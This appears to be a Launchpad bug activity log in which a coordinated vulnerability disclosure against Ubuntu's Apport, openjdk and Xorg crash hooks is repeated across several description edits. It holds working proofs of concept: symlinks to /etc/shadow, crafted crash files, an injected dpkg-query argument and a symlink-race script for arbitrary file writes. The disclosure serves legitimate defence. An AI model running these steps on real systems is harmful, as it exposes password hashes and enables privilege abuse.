Activity log for bug #1917904

Date Who What changed Old value New value Message
2021-03-05 15:54:22 mal bug added bug
2021-03-05 16:07:29 mal description # Vulnerabilities in Apport During a cursory code review, several potential security issues in `apport` and crash-related hooks in packages such as `Xorg` and `openjdk-14-lts` have been identified. While the issue regarding the `openjdk-14-lts` package is exploitable on default installations, the remaining issues most likely are mitigated by the sysctl setting `fs.protected_symlinks` on default Ubuntu installations. With regard to issues mitigated by `fs.protected_symlinks`, it is not clear if they are considered to be part of the threat model, but nonetheless will be included in this report. Further, if the issues regarding package hooks should be reported in the corresponding packages' bug tracker, please let me know. ## Issue 1: Arbitrary file read in package-hooks/source_openjdk-*.py (Medium) The `add_info()` function allows for a directory traversal by building a file path using user-controlled data without properly sanitizing the resulting path. ```Python def add_info(report, ui=None): if report['ProblemType'] == 'Crash' and 'ProcCwd' in report: # attach hs_err_<pid>.pid file cwd = report['ProcCwd'] pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"]) if pid_line: pid = pid_line.groups()[0] path = "%s/hs_err_pid%s.log" % (cwd, pid) # make sure if exists if os.path.exists(path): content = read_file(path) # truncate if bigger than 100 KB # see LP: #1696814 max_length = 100*1024 if sys.getsizeof(content) < max_length: report['HotspotError'] = content report['Tags'] += ' openjdk-hs-err' else: report['HotspotError'] = content[:max_length] + \ "\n[truncated by openjdk-11 apport hook]" + \ "\n[max log size is %s, file size was %s]" % \ (si_units(max_length), si_units(sys.getsizeof(content))) report['Tags'] += ' openjdk-hs-err' ``` By injecting a `ProcCwd` such as `/home/user/` and a `Pid` such as `0`, the function includes an arbitrary file by following a potential symbolic link `/home/user/hs_err_pid0.log`. ### PoC ``` $ sudo apt install openjdk-14-jdk $ sudo sysctl fs.protected_symlinks fs.protected_symlinks = 1 $ ln -s /etc/shadow /home/user/hs_err_pid0.log $ pid=$'\t0';cat << EOF > /var/crash/poc.crash ProblemType: Crash ExecutablePath: /poc Package: openjdk-lts 123 SourcePackage: openjdk-lts ProcCwd: /home/user ProcStatus: Pid:$pid Uid:$pid EOF $ grep -A3 root: /var/crash/poc.crash root:!:18393:0:99999:7::: daemon:*:18375:0:99999:7::: bin:*:18375:0:99999:7::: sys:*:18375:0:99999:7::: ``` ## Issue 2: Arbitrary file read in package-hooks/source_xorg.py (Info) The root cause of this issue stems from the fact, that a potentially user-controlled file in the `/tmp` directory is not checked for being a symbolic link and therefore might allow including arbitrary files in the processed crash report: Note: Requires `fs.protected_symlinks=0` ```Python def attach_3d_info(report, ui=None): ... # Compiz internal state if compiz crashed if True or report.get('SourcePackage','Unknown') == "compiz" and "ProcStatus" in report: compiz_pid = 0 pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"]) if pid_line: compiz_pid = pid_line.groups()[0] compiz_state_file = '/tmp/compiz_internal_state%s' % compiz_pid attach_file_if_exists(report, compiz_state_file, "compiz_internal_states") ``` ### PoC ``` $ sudo sysctl fs.protected_symlinks=0 fs.protected_symlinks = 0 $ ln -s /etc/shadow /tmp/compiz_internal_state0 $ cat << EOF > /var/crash/poc.crash ProblemType: Crash ExecutablePath: /poc Package: source_xorg 123 SourcePackage: compiz ProcStatus: Pid: EOF $ grep -A3 compiz_internal poc.crash compiz_internal_states: root:!:18686:0:99999:7::: daemon:*:18474:0:99999:7::: bin:*:18474:0:99999:7::: ``` ## Issue 3: Spoof modified configuration files via argument injection (Info) The `get_modified_conffiles()` function allows to spoof modified configuration files by a controlled package name: ```Python def get_modified_conffiles(self, package): ... dpkg = subprocess.Popen(['dpkg-query', '-W', '--showformat=${Conffiles}', package], stdout=subprocess.PIPE) ``` By supplying a `package` name such as `--showformat='${Conffiles;6}shadow 1\n'` it is possible to manipulate dpkg-query's output and therefore to include the `shadow` file in the resulting crash report. Please note however that this function is seemingly only called in the `attach_conffiles()` function, which subsequently requires a UI response of the user to finally include the file in the crash report. ### PoC ``` $ dpkg-query -W --showformat='${Conffiles}' --showformat='${Conffiles;6}shadow 1\n' | head -n2 /etc/shadow 1 shadow 1 ``` ## Issue 4: Arbitrary file write in whoopsie-upload-all (Info) After adding additional information to the crash file, `whoopsie-upload-all` does not check if the crash file was replaced by a symbolic link before writing the extended report back into the file. Thus, replacing the crash file with a symbolic link allows to write into arbitrary files using `whoopsie-upload-all`'s elevated privileges. By using a program's lax configuration parsing (e.g. `logrotate`), this might lead to code execution. Note: Requires `fs.protected_symlinks=0` ```Python def process_report(report): '''Collect information for a report and mark for whoopsie upload ... # write updated report, we use os.open and os.fdopen as # /proc/sys/fs/protected_regular is set to 1 (LP: #1848064) fd = os.open(report, os.O_WRONLY | os.O_APPEND) with os.fdopen(fd, 'wb') as f: os.chmod(report, 0) r.write(f, only_new=True) os.chmod(report, 0o640) ``` ### PoC ``` $ sudo sysctl fs.protected_symlinks fs.protected_symlinks = 0 $ cat ex.sh TARGET="/JRN" while :; do FN="/var/crash/$RANDOM.poc.crash" pid=$'\t0';cat << EOF > $FN ProblemType: Crash ExecutablePath: /poc Package: openjdk-lts 123 SourcePackage: openjdk-lts ProcCwd: /home/user ProcStatus: Pid:$pid Uid:$pid EOF while :; do if ps aux|grep -q "[w]hoopsie-upload-all";then break; fi done sleep 0.3 rm -f $FN ln -s $TARGET $FN if [ -s /JRN ]; then echo DONE.; break; fi done $ sudo touch /JRN; ls -l /JRN # simulating file in e.g. /etc/logrotate.d/ -rw-r--r-- 1 root root 0 M�r 3 14:15 /JRN $ bash ex.sh DONE. $ ls -l /JRN; sudo head -n3 /JRN -rw-r----- 1 root root 105028 M�r 3 14:16 /JRN ApportVersion: 2.20.11-0ubuntu27.16 Architecture: amd64 CasperMD5CheckResult: skip ``` # Credits Please credit maik@secfault-security.com (@fktio) if the issues are considered valid. Further, please coordinate the patch release date with us, in case we consider publishing a short article about these issues. Best regard, maik # Vulnerabilities in Apport During a cursory code review, several potential security issues in `apport` and crash-related hooks in packages such as `Xorg` and `openjdk-14-lts` have been identified. While the issue regarding the `openjdk-14-lts` package is exploitable on default installations, the remaining issues most likely are mitigated by the sysctl setting `fs.protected_symlinks` on default Ubuntu installations. With regard to issues mitigated by `fs.protected_symlinks`, it is not clear if they are considered to be part of the threat model, but nonetheless will be included in this report. Further, if the issues regarding package hooks should be reported in the corresponding packages' bug tracker, please let me know. ## Issue 1: Arbitrary file read in package-hooks/source_openjdk-*.py The `add_info()` function allows for a directory traversal by building a file path using user-controlled data without properly sanitizing the resulting path. ```Python def add_info(report, ui=None):     if report['ProblemType'] == 'Crash' and 'ProcCwd' in report:         # attach hs_err_<pid>.pid file         cwd = report['ProcCwd']         pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])         if pid_line:             pid = pid_line.groups()[0]             path = "%s/hs_err_pid%s.log" % (cwd, pid)             # make sure if exists             if os.path.exists(path):                 content = read_file(path)                 # truncate if bigger than 100 KB                 # see LP: #1696814                 max_length = 100*1024                 if sys.getsizeof(content) < max_length:                     report['HotspotError'] = content                     report['Tags'] += ' openjdk-hs-err'                 else:                     report['HotspotError'] = content[:max_length] + \                             "\n[truncated by openjdk-11 apport hook]" + \                             "\n[max log size is %s, file size was %s]" % \                             (si_units(max_length), si_units(sys.getsizeof(content)))                     report['Tags'] += ' openjdk-hs-err' ``` By injecting a `ProcCwd` such as `/home/user/` and a `Pid` such as `0`, the function includes an arbitrary file by following a potential symbolic link `/home/user/hs_err_pid0.log`. ### PoC ``` $ sudo apt install openjdk-14-jdk $ sudo sysctl fs.protected_symlinks fs.protected_symlinks = 1 $ ln -s /etc/shadow /home/user/hs_err_pid0.log $ pid=$'\t0';cat << EOF > /var/crash/poc.crash ProblemType: Crash ExecutablePath: /poc Package: openjdk-lts 123 SourcePackage: openjdk-lts ProcCwd: /home/user ProcStatus:  Pid:$pid  Uid:$pid EOF $ grep -A3 root: /var/crash/poc.crash  root:!:18393:0:99999:7:::  daemon:*:18375:0:99999:7:::  bin:*:18375:0:99999:7:::  sys:*:18375:0:99999:7::: ``` ## Issue 2: Arbitrary file read in package-hooks/source_xorg.py (Info) The root cause of this issue stems from the fact, that a potentially user-controlled file in the `/tmp` directory is not checked for being a symbolic link and therefore might allow including arbitrary files in the processed crash report: Note: Requires `fs.protected_symlinks=0` ```Python def attach_3d_info(report, ui=None):     ...     # Compiz internal state if compiz crashed     if True or report.get('SourcePackage','Unknown') == "compiz" and "ProcStatus" in report:         compiz_pid = 0         pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])         if pid_line:             compiz_pid = pid_line.groups()[0]         compiz_state_file = '/tmp/compiz_internal_state%s' % compiz_pid         attach_file_if_exists(report, compiz_state_file, "compiz_internal_states") ``` ### PoC ``` $ sudo sysctl fs.protected_symlinks=0 fs.protected_symlinks = 0 $ ln -s /etc/shadow /tmp/compiz_internal_state0 $ cat << EOF > /var/crash/poc.crash ProblemType: Crash ExecutablePath: /poc Package: source_xorg 123 SourcePackage: compiz ProcStatus:  Pid: EOF $ grep -A3 compiz_internal poc.crash compiz_internal_states:  root:!:18686:0:99999:7:::  daemon:*:18474:0:99999:7:::  bin:*:18474:0:99999:7::: ``` ## Issue 3: Spoof modified configuration files via argument injection (Info) The `get_modified_conffiles()` function allows to spoof modified configuration files by a controlled package name: ```Python def get_modified_conffiles(self, package): ...     dpkg = subprocess.Popen(['dpkg-query', '-W', '--showformat=${Conffiles}',                               package], stdout=subprocess.PIPE) ``` By supplying a `package` name such as `--showformat='${Conffiles;6}shadow 1\n'` it is possible to manipulate dpkg-query's output and therefore to include the `shadow` file in the resulting crash report. Please note however that this function is seemingly only called in the `attach_conffiles()` function, which subsequently requires a UI response of the user to finally include the file in the crash report. ### PoC ``` $ dpkg-query -W --showformat='${Conffiles}' --showformat='${Conffiles;6}shadow 1\n' | head -n2  /etc/shadow 1       shadow 1 ``` ## Issue 4: Arbitrary file write in whoopsie-upload-all (Info) After adding additional information to the crash file, `whoopsie-upload-all` does not check if the crash file was replaced by a symbolic link before writing the extended report back into the file. Thus, replacing the crash file with a symbolic link allows to write into arbitrary files using `whoopsie-upload-all`'s elevated privileges. By using a program's lax configuration parsing (e.g. `logrotate`), this might lead to code execution. Note: Requires `fs.protected_symlinks=0` ```Python def process_report(report):     '''Collect information for a report and mark for whoopsie upload     ...         # write updated report, we use os.open and os.fdopen as         # /proc/sys/fs/protected_regular is set to 1 (LP: #1848064)         fd = os.open(report, os.O_WRONLY | os.O_APPEND)         with os.fdopen(fd, 'wb') as f:             os.chmod(report, 0)             r.write(f, only_new=True)             os.chmod(report, 0o640) ``` ### PoC ``` $ sudo sysctl fs.protected_symlinks fs.protected_symlinks = 0 $ cat ex.sh TARGET="/JRN" while :; do   FN="/var/crash/$RANDOM.poc.crash"   pid=$'\t0';cat << EOF > $FN ProblemType: Crash ExecutablePath: /poc Package: openjdk-lts 123 SourcePackage: openjdk-lts ProcCwd: /home/user ProcStatus:  Pid:$pid  Uid:$pid EOF   while :; do     if ps aux|grep -q "[w]hoopsie-upload-all";then break; fi   done   sleep 0.3   rm -f $FN   ln -s $TARGET $FN   if [ -s /JRN ]; then echo DONE.; break; fi done $ sudo touch /JRN; ls -l /JRN # simulating file in e.g. /etc/logrotate.d/ -rw-r--r-- 1 root root 0 M�r 3 14:15 /JRN $ bash ex.sh DONE. $ ls -l /JRN; sudo head -n3 /JRN -rw-r----- 1 root root 105028 M�r 3 14:16 /JRN ApportVersion: 2.20.11-0ubuntu27.16 Architecture: amd64 CasperMD5CheckResult: skip ``` # Credits Please credit maik@secfault-security.com (@fktio) if the issues are considered valid. Further, please coordinate the patch release date with us, in case we consider publishing a short article about these issues. Best regard, maik
2021-03-05 16:08:21 mal description # Vulnerabilities in Apport During a cursory code review, several potential security issues in `apport` and crash-related hooks in packages such as `Xorg` and `openjdk-14-lts` have been identified. While the issue regarding the `openjdk-14-lts` package is exploitable on default installations, the remaining issues most likely are mitigated by the sysctl setting `fs.protected_symlinks` on default Ubuntu installations. With regard to issues mitigated by `fs.protected_symlinks`, it is not clear if they are considered to be part of the threat model, but nonetheless will be included in this report. Further, if the issues regarding package hooks should be reported in the corresponding packages' bug tracker, please let me know. ## Issue 1: Arbitrary file read in package-hooks/source_openjdk-*.py The `add_info()` function allows for a directory traversal by building a file path using user-controlled data without properly sanitizing the resulting path. ```Python def add_info(report, ui=None):     if report['ProblemType'] == 'Crash' and 'ProcCwd' in report:         # attach hs_err_<pid>.pid file         cwd = report['ProcCwd']         pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])         if pid_line:             pid = pid_line.groups()[0]             path = "%s/hs_err_pid%s.log" % (cwd, pid)             # make sure if exists             if os.path.exists(path):                 content = read_file(path)                 # truncate if bigger than 100 KB                 # see LP: #1696814                 max_length = 100*1024                 if sys.getsizeof(content) < max_length:                     report['HotspotError'] = content                     report['Tags'] += ' openjdk-hs-err'                 else:                     report['HotspotError'] = content[:max_length] + \                             "\n[truncated by openjdk-11 apport hook]" + \                             "\n[max log size is %s, file size was %s]" % \                             (si_units(max_length), si_units(sys.getsizeof(content)))                     report['Tags'] += ' openjdk-hs-err' ``` By injecting a `ProcCwd` such as `/home/user/` and a `Pid` such as `0`, the function includes an arbitrary file by following a potential symbolic link `/home/user/hs_err_pid0.log`. ### PoC ``` $ sudo apt install openjdk-14-jdk $ sudo sysctl fs.protected_symlinks fs.protected_symlinks = 1 $ ln -s /etc/shadow /home/user/hs_err_pid0.log $ pid=$'\t0';cat << EOF > /var/crash/poc.crash ProblemType: Crash ExecutablePath: /poc Package: openjdk-lts 123 SourcePackage: openjdk-lts ProcCwd: /home/user ProcStatus:  Pid:$pid  Uid:$pid EOF $ grep -A3 root: /var/crash/poc.crash  root:!:18393:0:99999:7:::  daemon:*:18375:0:99999:7:::  bin:*:18375:0:99999:7:::  sys:*:18375:0:99999:7::: ``` ## Issue 2: Arbitrary file read in package-hooks/source_xorg.py (Info) The root cause of this issue stems from the fact, that a potentially user-controlled file in the `/tmp` directory is not checked for being a symbolic link and therefore might allow including arbitrary files in the processed crash report: Note: Requires `fs.protected_symlinks=0` ```Python def attach_3d_info(report, ui=None):     ...     # Compiz internal state if compiz crashed     if True or report.get('SourcePackage','Unknown') == "compiz" and "ProcStatus" in report:         compiz_pid = 0         pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])         if pid_line:             compiz_pid = pid_line.groups()[0]         compiz_state_file = '/tmp/compiz_internal_state%s' % compiz_pid         attach_file_if_exists(report, compiz_state_file, "compiz_internal_states") ``` ### PoC ``` $ sudo sysctl fs.protected_symlinks=0 fs.protected_symlinks = 0 $ ln -s /etc/shadow /tmp/compiz_internal_state0 $ cat << EOF > /var/crash/poc.crash ProblemType: Crash ExecutablePath: /poc Package: source_xorg 123 SourcePackage: compiz ProcStatus:  Pid: EOF $ grep -A3 compiz_internal poc.crash compiz_internal_states:  root:!:18686:0:99999:7:::  daemon:*:18474:0:99999:7:::  bin:*:18474:0:99999:7::: ``` ## Issue 3: Spoof modified configuration files via argument injection (Info) The `get_modified_conffiles()` function allows to spoof modified configuration files by a controlled package name: ```Python def get_modified_conffiles(self, package): ...     dpkg = subprocess.Popen(['dpkg-query', '-W', '--showformat=${Conffiles}',                               package], stdout=subprocess.PIPE) ``` By supplying a `package` name such as `--showformat='${Conffiles;6}shadow 1\n'` it is possible to manipulate dpkg-query's output and therefore to include the `shadow` file in the resulting crash report. Please note however that this function is seemingly only called in the `attach_conffiles()` function, which subsequently requires a UI response of the user to finally include the file in the crash report. ### PoC ``` $ dpkg-query -W --showformat='${Conffiles}' --showformat='${Conffiles;6}shadow 1\n' | head -n2  /etc/shadow 1       shadow 1 ``` ## Issue 4: Arbitrary file write in whoopsie-upload-all (Info) After adding additional information to the crash file, `whoopsie-upload-all` does not check if the crash file was replaced by a symbolic link before writing the extended report back into the file. Thus, replacing the crash file with a symbolic link allows to write into arbitrary files using `whoopsie-upload-all`'s elevated privileges. By using a program's lax configuration parsing (e.g. `logrotate`), this might lead to code execution. Note: Requires `fs.protected_symlinks=0` ```Python def process_report(report):     '''Collect information for a report and mark for whoopsie upload     ...         # write updated report, we use os.open and os.fdopen as         # /proc/sys/fs/protected_regular is set to 1 (LP: #1848064)         fd = os.open(report, os.O_WRONLY | os.O_APPEND)         with os.fdopen(fd, 'wb') as f:             os.chmod(report, 0)             r.write(f, only_new=True)             os.chmod(report, 0o640) ``` ### PoC ``` $ sudo sysctl fs.protected_symlinks fs.protected_symlinks = 0 $ cat ex.sh TARGET="/JRN" while :; do   FN="/var/crash/$RANDOM.poc.crash"   pid=$'\t0';cat << EOF > $FN ProblemType: Crash ExecutablePath: /poc Package: openjdk-lts 123 SourcePackage: openjdk-lts ProcCwd: /home/user ProcStatus:  Pid:$pid  Uid:$pid EOF   while :; do     if ps aux|grep -q "[w]hoopsie-upload-all";then break; fi   done   sleep 0.3   rm -f $FN   ln -s $TARGET $FN   if [ -s /JRN ]; then echo DONE.; break; fi done $ sudo touch /JRN; ls -l /JRN # simulating file in e.g. /etc/logrotate.d/ -rw-r--r-- 1 root root 0 M�r 3 14:15 /JRN $ bash ex.sh DONE. $ ls -l /JRN; sudo head -n3 /JRN -rw-r----- 1 root root 105028 M�r 3 14:16 /JRN ApportVersion: 2.20.11-0ubuntu27.16 Architecture: amd64 CasperMD5CheckResult: skip ``` # Credits Please credit maik@secfault-security.com (@fktio) if the issues are considered valid. Further, please coordinate the patch release date with us, in case we consider publishing a short article about these issues. Best regard, maik # Vulnerabilities in Apport During a cursory code review, several potential security issues in `apport` and crash-related hooks in packages such as `Xorg` and `openjdk-14-lts` have been identified. While the issue regarding the `openjdk-14-lts` package is exploitable on default installations, the remaining issues most likely are mitigated by the sysctl setting `fs.protected_symlinks` on default Ubuntu installations. With regard to issues mitigated by `fs.protected_symlinks`, it is not clear if they are considered to be part of the threat model, but nonetheless will be included in this report. Further, if the issues regarding package hooks should be reported in the corresponding packages' bug tracker, please let me know. ## Issue 1: Arbitrary file read in package-hooks/source_openjdk-*.py The `add_info()` function allows for a directory traversal by building a file path using user-controlled data without properly sanitizing the resulting path. ```Python def add_info(report, ui=None):     if report['ProblemType'] == 'Crash' and 'ProcCwd' in report:         # attach hs_err_<pid>.pid file         cwd = report['ProcCwd']         pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])         if pid_line:             pid = pid_line.groups()[0]             path = "%s/hs_err_pid%s.log" % (cwd, pid)             # make sure if exists             if os.path.exists(path):                 content = read_file(path)                 # truncate if bigger than 100 KB                 # see LP: #1696814                 max_length = 100*1024                 if sys.getsizeof(content) < max_length:                     report['HotspotError'] = content                     report['Tags'] += ' openjdk-hs-err'                 else:                     report['HotspotError'] = content[:max_length] + \                             "\n[truncated by openjdk-11 apport hook]" + \                             "\n[max log size is %s, file size was %s]" % \                             (si_units(max_length), si_units(sys.getsizeof(content)))                     report['Tags'] += ' openjdk-hs-err' ``` By injecting a `ProcCwd` such as `/home/user/` and a `Pid` such as `0`, the function includes an arbitrary file by following a potential symbolic link `/home/user/hs_err_pid0.log`. ### PoC ``` $ sudo apt install openjdk-14-jdk $ sudo sysctl fs.protected_symlinks fs.protected_symlinks = 1 $ ln -s /etc/shadow /home/user/hs_err_pid0.log $ pid=$'\t0';cat << EOF > /var/crash/poc.crash ProblemType: Crash ExecutablePath: /poc Package: openjdk-lts 123 SourcePackage: openjdk-lts ProcCwd: /home/user ProcStatus:  Pid:$pid  Uid:$pid EOF $ grep -A3 root: /var/crash/poc.crash  root:!:18393:0:99999:7:::  daemon:*:18375:0:99999:7:::  bin:*:18375:0:99999:7:::  sys:*:18375:0:99999:7::: ``` ## Issue 2: Arbitrary file read in package-hooks/source_xorg.py (Info) The root cause of this issue stems from the fact, that a potentially user-controlled file in the `/tmp` directory is not checked for being a symbolic link and therefore might allow including arbitrary files in the processed crash report: Note: Requires `fs.protected_symlinks=0` ```Python def attach_3d_info(report, ui=None):     ...     # Compiz internal state if compiz crashed     if True or report.get('SourcePackage','Unknown') == "compiz" and "ProcStatus" in report:         compiz_pid = 0         pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])         if pid_line:             compiz_pid = pid_line.groups()[0]         compiz_state_file = '/tmp/compiz_internal_state%s' % compiz_pid         attach_file_if_exists(report, compiz_state_file, "compiz_internal_states") ``` ### PoC ``` $ sudo sysctl fs.protected_symlinks=0 fs.protected_symlinks = 0 $ ln -s /etc/shadow /tmp/compiz_internal_state0 $ cat << EOF > /var/crash/poc.crash ProblemType: Crash ExecutablePath: /poc Package: source_xorg 123 SourcePackage: compiz ProcStatus:  Pid: EOF $ grep -A3 compiz_internal poc.crash compiz_internal_states:  root:!:18686:0:99999:7:::  daemon:*:18474:0:99999:7:::  bin:*:18474:0:99999:7::: ``` ## Issue 3: Spoof modified config files via argument injection (Info) The `get_modified_conffiles()` function allows to spoof modified configuration files by a controlled package name: ```Python def get_modified_conffiles(self, package): ...     dpkg = subprocess.Popen(['dpkg-query', '-W', '--showformat=${Conffiles}',                               package], stdout=subprocess.PIPE) ``` By supplying a `package` name such as `--showformat='${Conffiles;6}shadow 1\n'` it is possible to manipulate dpkg-query's output and therefore to include the `shadow` file in the resulting crash report. Please note however that this function is seemingly only called in the `attach_conffiles()` function, which subsequently requires a UI response of the user to finally include the file in the crash report. ### PoC ``` $ dpkg-query -W --showformat='${Conffiles}' --showformat='${Conffiles;6}shadow 1\n' | head -n2  /etc/shadow 1       shadow 1 ``` ## Issue 4: Arbitrary file write in whoopsie-upload-all (Info) After adding additional information to the crash file, `whoopsie-upload-all` does not check if the crash file was replaced by a symbolic link before writing the extended report back into the file. Thus, replacing the crash file with a symbolic link allows to write into arbitrary files using `whoopsie-upload-all`'s elevated privileges. By using a program's lax configuration parsing (e.g. `logrotate`), this might lead to code execution. Note: Requires `fs.protected_symlinks=0` ```Python def process_report(report):     '''Collect information for a report and mark for whoopsie upload     ...         # write updated report, we use os.open and os.fdopen as         # /proc/sys/fs/protected_regular is set to 1 (LP: #1848064)         fd = os.open(report, os.O_WRONLY | os.O_APPEND)         with os.fdopen(fd, 'wb') as f:             os.chmod(report, 0)             r.write(f, only_new=True)             os.chmod(report, 0o640) ``` ### PoC ``` $ sudo sysctl fs.protected_symlinks fs.protected_symlinks = 0 $ cat ex.sh TARGET="/JRN" while :; do   FN="/var/crash/$RANDOM.poc.crash"   pid=$'\t0';cat << EOF > $FN ProblemType: Crash ExecutablePath: /poc Package: openjdk-lts 123 SourcePackage: openjdk-lts ProcCwd: /home/user ProcStatus:  Pid:$pid  Uid:$pid EOF   while :; do     if ps aux|grep -q "[w]hoopsie-upload-all";then break; fi   done   sleep 0.3   rm -f $FN   ln -s $TARGET $FN   if [ -s /JRN ]; then echo DONE.; break; fi done $ sudo touch /JRN; ls -l /JRN # simulating file in e.g. /etc/logrotate.d/ -rw-r--r-- 1 root root 0 M�r 3 14:15 /JRN $ bash ex.sh DONE. $ ls -l /JRN; sudo head -n3 /JRN -rw-r----- 1 root root 105028 M�r 3 14:16 /JRN ApportVersion: 2.20.11-0ubuntu27.16 Architecture: amd64 CasperMD5CheckResult: skip ``` # Credits Please credit maik@secfault-security.com (@fktio) if the issues are considered valid. Further, please coordinate the patch release date with us, in case we consider publishing a short article about these issues. Best regard, maik
2021-03-05 16:41:43 mal description # Vulnerabilities in Apport During a cursory code review, several potential security issues in `apport` and crash-related hooks in packages such as `Xorg` and `openjdk-14-lts` have been identified. While the issue regarding the `openjdk-14-lts` package is exploitable on default installations, the remaining issues most likely are mitigated by the sysctl setting `fs.protected_symlinks` on default Ubuntu installations. With regard to issues mitigated by `fs.protected_symlinks`, it is not clear if they are considered to be part of the threat model, but nonetheless will be included in this report. Further, if the issues regarding package hooks should be reported in the corresponding packages' bug tracker, please let me know. ## Issue 1: Arbitrary file read in package-hooks/source_openjdk-*.py The `add_info()` function allows for a directory traversal by building a file path using user-controlled data without properly sanitizing the resulting path. ```Python def add_info(report, ui=None):     if report['ProblemType'] == 'Crash' and 'ProcCwd' in report:         # attach hs_err_<pid>.pid file         cwd = report['ProcCwd']         pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])         if pid_line:             pid = pid_line.groups()[0]             path = "%s/hs_err_pid%s.log" % (cwd, pid)             # make sure if exists             if os.path.exists(path):                 content = read_file(path)                 # truncate if bigger than 100 KB                 # see LP: #1696814                 max_length = 100*1024                 if sys.getsizeof(content) < max_length:                     report['HotspotError'] = content                     report['Tags'] += ' openjdk-hs-err'                 else:                     report['HotspotError'] = content[:max_length] + \                             "\n[truncated by openjdk-11 apport hook]" + \                             "\n[max log size is %s, file size was %s]" % \                             (si_units(max_length), si_units(sys.getsizeof(content)))                     report['Tags'] += ' openjdk-hs-err' ``` By injecting a `ProcCwd` such as `/home/user/` and a `Pid` such as `0`, the function includes an arbitrary file by following a potential symbolic link `/home/user/hs_err_pid0.log`. ### PoC ``` $ sudo apt install openjdk-14-jdk $ sudo sysctl fs.protected_symlinks fs.protected_symlinks = 1 $ ln -s /etc/shadow /home/user/hs_err_pid0.log $ pid=$'\t0';cat << EOF > /var/crash/poc.crash ProblemType: Crash ExecutablePath: /poc Package: openjdk-lts 123 SourcePackage: openjdk-lts ProcCwd: /home/user ProcStatus:  Pid:$pid  Uid:$pid EOF $ grep -A3 root: /var/crash/poc.crash  root:!:18393:0:99999:7:::  daemon:*:18375:0:99999:7:::  bin:*:18375:0:99999:7:::  sys:*:18375:0:99999:7::: ``` ## Issue 2: Arbitrary file read in package-hooks/source_xorg.py (Info) The root cause of this issue stems from the fact, that a potentially user-controlled file in the `/tmp` directory is not checked for being a symbolic link and therefore might allow including arbitrary files in the processed crash report: Note: Requires `fs.protected_symlinks=0` ```Python def attach_3d_info(report, ui=None):     ...     # Compiz internal state if compiz crashed     if True or report.get('SourcePackage','Unknown') == "compiz" and "ProcStatus" in report:         compiz_pid = 0         pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])         if pid_line:             compiz_pid = pid_line.groups()[0]         compiz_state_file = '/tmp/compiz_internal_state%s' % compiz_pid         attach_file_if_exists(report, compiz_state_file, "compiz_internal_states") ``` ### PoC ``` $ sudo sysctl fs.protected_symlinks=0 fs.protected_symlinks = 0 $ ln -s /etc/shadow /tmp/compiz_internal_state0 $ cat << EOF > /var/crash/poc.crash ProblemType: Crash ExecutablePath: /poc Package: source_xorg 123 SourcePackage: compiz ProcStatus:  Pid: EOF $ grep -A3 compiz_internal poc.crash compiz_internal_states:  root:!:18686:0:99999:7:::  daemon:*:18474:0:99999:7:::  bin:*:18474:0:99999:7::: ``` ## Issue 3: Spoof modified config files via argument injection (Info) The `get_modified_conffiles()` function allows to spoof modified configuration files by a controlled package name: ```Python def get_modified_conffiles(self, package): ...     dpkg = subprocess.Popen(['dpkg-query', '-W', '--showformat=${Conffiles}',                               package], stdout=subprocess.PIPE) ``` By supplying a `package` name such as `--showformat='${Conffiles;6}shadow 1\n'` it is possible to manipulate dpkg-query's output and therefore to include the `shadow` file in the resulting crash report. Please note however that this function is seemingly only called in the `attach_conffiles()` function, which subsequently requires a UI response of the user to finally include the file in the crash report. ### PoC ``` $ dpkg-query -W --showformat='${Conffiles}' --showformat='${Conffiles;6}shadow 1\n' | head -n2  /etc/shadow 1       shadow 1 ``` ## Issue 4: Arbitrary file write in whoopsie-upload-all (Info) After adding additional information to the crash file, `whoopsie-upload-all` does not check if the crash file was replaced by a symbolic link before writing the extended report back into the file. Thus, replacing the crash file with a symbolic link allows to write into arbitrary files using `whoopsie-upload-all`'s elevated privileges. By using a program's lax configuration parsing (e.g. `logrotate`), this might lead to code execution. Note: Requires `fs.protected_symlinks=0` ```Python def process_report(report):     '''Collect information for a report and mark for whoopsie upload     ...         # write updated report, we use os.open and os.fdopen as         # /proc/sys/fs/protected_regular is set to 1 (LP: #1848064)         fd = os.open(report, os.O_WRONLY | os.O_APPEND)         with os.fdopen(fd, 'wb') as f:             os.chmod(report, 0)             r.write(f, only_new=True)             os.chmod(report, 0o640) ``` ### PoC ``` $ sudo sysctl fs.protected_symlinks fs.protected_symlinks = 0 $ cat ex.sh TARGET="/JRN" while :; do   FN="/var/crash/$RANDOM.poc.crash"   pid=$'\t0';cat << EOF > $FN ProblemType: Crash ExecutablePath: /poc Package: openjdk-lts 123 SourcePackage: openjdk-lts ProcCwd: /home/user ProcStatus:  Pid:$pid  Uid:$pid EOF   while :; do     if ps aux|grep -q "[w]hoopsie-upload-all";then break; fi   done   sleep 0.3   rm -f $FN   ln -s $TARGET $FN   if [ -s /JRN ]; then echo DONE.; break; fi done $ sudo touch /JRN; ls -l /JRN # simulating file in e.g. /etc/logrotate.d/ -rw-r--r-- 1 root root 0 M�r 3 14:15 /JRN $ bash ex.sh DONE. $ ls -l /JRN; sudo head -n3 /JRN -rw-r----- 1 root root 105028 M�r 3 14:16 /JRN ApportVersion: 2.20.11-0ubuntu27.16 Architecture: amd64 CasperMD5CheckResult: skip ``` # Credits Please credit maik@secfault-security.com (@fktio) if the issues are considered valid. Further, please coordinate the patch release date with us, in case we consider publishing a short article about these issues. Best regard, maik # Vulnerabilities in Apport During a cursory code review, several potential security issues in `apport` and crash-related hooks in packages such as `Xorg` and `openjdk-14-lts` have been identified. While the issue regarding the `openjdk-14-lts` package is exploitable on default installations, the remaining issues most likely are mitigated by the sysctl setting `fs.protected_symlinks` on default Ubuntu installations. With regard to issues mitigated by `fs.protected_symlinks`, it is not clear if they are considered to be part of the threat model, but nonetheless will be included in this report. Further, if the issues regarding package hooks should be reported in the corresponding packages' bug tracker, please let me know. ## Issue 1: Arbitrary file read in package-hooks/source_openjdk-*.py The `add_info()` function allows for a directory traversal by building a file path using user-controlled data without properly sanitizing the resulting path. ```Python def add_info(report, ui=None):     if report['ProblemType'] == 'Crash' and 'ProcCwd' in report:         # attach hs_err_<pid>.pid file         cwd = 